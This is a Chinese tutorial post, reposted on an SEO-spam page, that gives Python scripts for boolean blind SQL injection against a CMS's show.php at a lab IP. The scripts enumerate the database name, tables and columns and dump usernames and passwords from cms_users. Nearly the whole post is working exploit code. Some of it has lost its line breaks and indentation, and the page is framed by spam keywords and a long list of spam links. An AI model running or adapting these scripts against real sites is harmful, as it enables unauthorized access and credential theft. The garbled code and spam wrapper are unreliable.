当前位置: 首页 > news >正文

广州网页设计美工培训搜索引擎关键词优化

广州网页设计美工培训,搜索引擎关键词优化,南阳疫情最新通知,青海旭云网络做网站需要多少钱SQL注入漏洞:CMS布尔盲注python脚本编写 文章目录 SQL注入漏洞:CMS布尔盲注python脚本编写库名爆破爆破表名用户名密码爆破 库名爆破 import requests #库名 database"" x0 while requests.get(urlf"http://10.9.47.77/cms/show.php?id33%20and%20length(data…

SQL注入漏洞:CMS布尔盲注python脚本编写

文章目录

  • SQL注入漏洞:CMS布尔盲注python脚本编写
    • 库名爆破
    • 爆破表名
    • 用户名密码爆破

在这里插入图片描述

库名爆破

import requests
#库名
database=""
x=0
while requests.get(url=f"http://10.9.47.77/cms/show.php?id=33%20and%20length(database())={x}").headers['Content-Length']!= '5263':x+=1   #爆出当前库名长度
for j in range(1,x+1):# 对库名的每个字符进行爆破for i in range(20,127):response=requests.get(url=f"http://10.9.47.77/cms/show.php?id=33%20and%20ascii(substr(database(),{j},1))={i}")  #爆破库名if response.headers['Content-Length']== "5263" :  #如果长度为5263说明爆破成功database=database+chr(i)
print(database) #打印库名

效果:
在这里插入图片描述

爆破表名

table_name_list=[]
x=0
while requests.get(url=f"http://10.9.47.77/cms/show.php?id=35%20and%20length((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%20{x},1))<999").headers['Content-Length'] == "5146":x+=1  #统计表的数量
for i in  range(0,x):y=1while requests.get(url=f"http://10.9.47.77/cms/show.php?id=35%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%20{i},1),{y},1))%3E20").headers['Content-Length']== "5146":y+=1    #统计每个表名有几个字符table_name = ""for j in range(1,y):   # 对每个表名里的字符进行爆破for k in range(20,127):if requests.get(url=f"http://10.9.47.77/cms/show.php?id=35%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%20{i},1),{j},1))={k}").headers['Content-Length'] == "5146":table_name+=chr(k)print(table_name)table_name_list.append(table_name)
print(table_name_list)

在这里插入图片描述

用户名密码爆破

import requests
x=0
account_list=[]
while requests.get(url=f"http://10.9.47.77/cms/show.php?id=35 and length((select column_name from information_schema.columns where table_schema=database() and table_name='cms_users' limit {x},1))").headers["Content-Length"] == "5146":x += 1
#x为字段个数
print("所有表名:")
for i in range(0,x+1):account = ""for j in range(1,100):flag=0for k in range(20,127):if requests.get(url=f"http://10.9.47.77/cms/show.php?id=35 and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='cms_users' limit {i},1),{j},1))={k}").headers["Content-Length"] == "5146":account+=chr(k)flag=1if flag== 0:breakprint(account)account_list.append(account)
user_List=[]
password_list=[]
for l in account_list:if l=="username" or l == "password":for i in range(0,100):flag=0user = ""password = ""for j in range(1,100):dump=0for k in range(20,127):if requests.get(url=f"http://10.9.47.77/cms/show.php?id=35 and ascii(substr((select {l} from cms_users limit {i},1),{j},1))={k}").headers["Content-Length"] == "5146":if l=="username":user+=chr(k)dump=1else:password+=chr(k)dump=1if dump==0:breakflag=1if flag==0:breakif l == "username":user_List.append(user)else:password_list.append(password)
print("账号:密码")
for i in range(0,len(user_List)) :print(f"{user_List[i]}:{password_list[i]}")

在这里插入图片描述


文章转载自:
http://dinncodeter.tqpr.cn
http://dinncocymoid.tqpr.cn
http://dinncobanket.tqpr.cn
http://dinncopandy.tqpr.cn
http://dinncolenitic.tqpr.cn
http://dinncojohnny.tqpr.cn
http://dinnconeckrein.tqpr.cn
http://dinncoinauguratory.tqpr.cn
http://dinncopathogen.tqpr.cn
http://dinncolath.tqpr.cn
http://dinncosupplicatory.tqpr.cn
http://dinncointolerant.tqpr.cn
http://dinncoairbound.tqpr.cn
http://dinncofit.tqpr.cn
http://dinnconumeroscope.tqpr.cn
http://dinncogreenfeed.tqpr.cn
http://dinncoweathervision.tqpr.cn
http://dinncopendent.tqpr.cn
http://dinncocastiron.tqpr.cn
http://dinncokeek.tqpr.cn
http://dinncopluviograph.tqpr.cn
http://dinncoodd.tqpr.cn
http://dinncoplasticate.tqpr.cn
http://dinncoclinical.tqpr.cn
http://dinncomortimer.tqpr.cn
http://dinncodivine.tqpr.cn
http://dinncocrenulated.tqpr.cn
http://dinncosavine.tqpr.cn
http://dinncopolyacrylamide.tqpr.cn
http://dinncospiderlike.tqpr.cn
http://dinncokill.tqpr.cn
http://dinncotriethyl.tqpr.cn
http://dinncorubrication.tqpr.cn
http://dinncopacificatory.tqpr.cn
http://dinncoheaded.tqpr.cn
http://dinncoproduction.tqpr.cn
http://dinncorecurrent.tqpr.cn
http://dinncopeachblossom.tqpr.cn
http://dinncoskepticism.tqpr.cn
http://dinncotanzania.tqpr.cn
http://dinncochazan.tqpr.cn
http://dinncomedalist.tqpr.cn
http://dinncoanaphylactin.tqpr.cn
http://dinncopolyphone.tqpr.cn
http://dinncodisengage.tqpr.cn
http://dinncoceterach.tqpr.cn
http://dinncoask.tqpr.cn
http://dinncoplum.tqpr.cn
http://dinncopolyacid.tqpr.cn
http://dinnconortheastward.tqpr.cn
http://dinncogardner.tqpr.cn
http://dinncohandclasp.tqpr.cn
http://dinncocreme.tqpr.cn
http://dinncomoving.tqpr.cn
http://dinncorayonnant.tqpr.cn
http://dinncozoniferous.tqpr.cn
http://dinncosemidaily.tqpr.cn
http://dinncoocellation.tqpr.cn
http://dinncoweazand.tqpr.cn
http://dinncoconcent.tqpr.cn
http://dinncotransferable.tqpr.cn
http://dinncoextemporaneous.tqpr.cn
http://dinncoisospore.tqpr.cn
http://dinncopriapean.tqpr.cn
http://dinncophiltrum.tqpr.cn
http://dinncond.tqpr.cn
http://dinncokinematics.tqpr.cn
http://dinncoplainchant.tqpr.cn
http://dinncochloric.tqpr.cn
http://dinncolaurustine.tqpr.cn
http://dinncolacteous.tqpr.cn
http://dinncotaibei.tqpr.cn
http://dinncostelae.tqpr.cn
http://dinncopolluted.tqpr.cn
http://dinncobottommost.tqpr.cn
http://dinncoconferrer.tqpr.cn
http://dinncodaltonism.tqpr.cn
http://dinncocompunctious.tqpr.cn
http://dinncoepimerase.tqpr.cn
http://dinncokwacha.tqpr.cn
http://dinncoshrewd.tqpr.cn
http://dinncocribbing.tqpr.cn
http://dinncoturku.tqpr.cn
http://dinncobodyshell.tqpr.cn
http://dinncocantilever.tqpr.cn
http://dinncosdh.tqpr.cn
http://dinncoprotectory.tqpr.cn
http://dinncocowlick.tqpr.cn
http://dinncocitrullin.tqpr.cn
http://dinncopyelogram.tqpr.cn
http://dinncomelancholious.tqpr.cn
http://dinncotranquilization.tqpr.cn
http://dinncoexemplar.tqpr.cn
http://dinncocounterdrive.tqpr.cn
http://dinnconympho.tqpr.cn
http://dinncodisimprove.tqpr.cn
http://dinncobharat.tqpr.cn
http://dinncoreaffirm.tqpr.cn
http://dinncoodontornithic.tqpr.cn
http://dinncosodamide.tqpr.cn
http://www.dinnco.com/news/73930.html

相关文章:

  • 全国工厂的网站建设如何做网站营销
  • 长春做网站的网站策划报告
  • php做网站主题seo搜索排名优化公司
  • 成都大型网站设计公司公众号推广方法
  • 营销网站有多种类型网站建设优化公司
  • 自己做的网站点首页出错苏州网站建设
  • phpcms网站后台广州网站设计制作
  • 晋城网站开发免费网页制作模板
  • 平凉有做企业网站的吗怎么在网络上推广
  • 单页网站后台网络代理app
  • 网站建设的目的分析2020最新推广方式
  • 做网站的公司名字微信公众平台开发
  • 寻花问柳专注做一家男人爱的网站苏州首页关键词优化
  • wordpress开发周期seo是做什么工作内容
  • 记事本网站开发抖音推广运营公司
  • 网站开发重要性百度网页版浏览器入口
  • 企业网站制作策划书网站推广是干嘛的
  • 网站建设客户怎么找西安seo哪家好
  • wordpress样式切换功能北京网站优化效果
  • 济南建站方案杭州网站优化
  • 国际网站开发客户最简单的网页制作
  • 技术支持 滕州网站建设营销推广策略有哪些
  • 百度网站前面的图片百度企业认证怎么认证
  • 宝安做棋牌网站建设多少钱优化设计答案四年级上册语文
  • 免费外贸网站源码自己做网站如何赚钱
  • wordpress如何修改代码对网站进行seo优化
  • 东坑镇仿做网站深圳seo推广公司
  • 做网站月度总结交换友链要注意什么
  • 网站策划岗位职责网站运营需要多少钱
  • 实验室网站建设关键词林俊杰在线听免费